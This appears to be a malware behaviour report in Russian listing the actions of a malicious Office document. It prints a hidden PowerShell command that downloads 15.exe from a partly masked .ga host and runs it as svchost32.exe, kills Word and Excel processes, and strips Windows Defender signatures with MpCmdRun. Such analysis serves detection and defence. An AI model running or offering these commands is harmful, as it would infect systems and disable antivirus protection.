Техническая информация
- http://pa####netwothree.ga/work/15.exe как c:\users\public\svchost32.exe
- '<SYSTEM32>\taskkill.exe' /f /im winword.exe
- '<SYSTEM32>\taskkill.exe' /f /im Excel.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im winword.exe & exit
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden taskkill /f /im Excel.exe
- '<SYSTEM32>\cmd.exe' /c cd "%ProgramFiles%\Windows Defender" & MpCmdRun.exe -removedefinitions -dynamicsignatures & exit
- %TEMP%\mpcmdrun.log
- DNS ASK pa####netwothree.ga
- ClassName: '' WindowName: ''
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (New-Object System.Net.WebClient).DownloadFile('http://pa####netwothree.ga/work/15.exe','C:\Users\Public\svchost32.exe');Start-Process 'C:\Users\Public\svchost32.exe'' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im winword.exe & exit' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden taskkill /f /im Excel.exe' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c cd "%ProgramFiles%\Windows Defender" & MpCmdRun.exe -removedefinitions -dynamicsignatures & exit' (со скрытым окном)
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '%ProgramFiles%\windows defender\mpcmdrun.exe' -removedefinitions -dynamicsignatures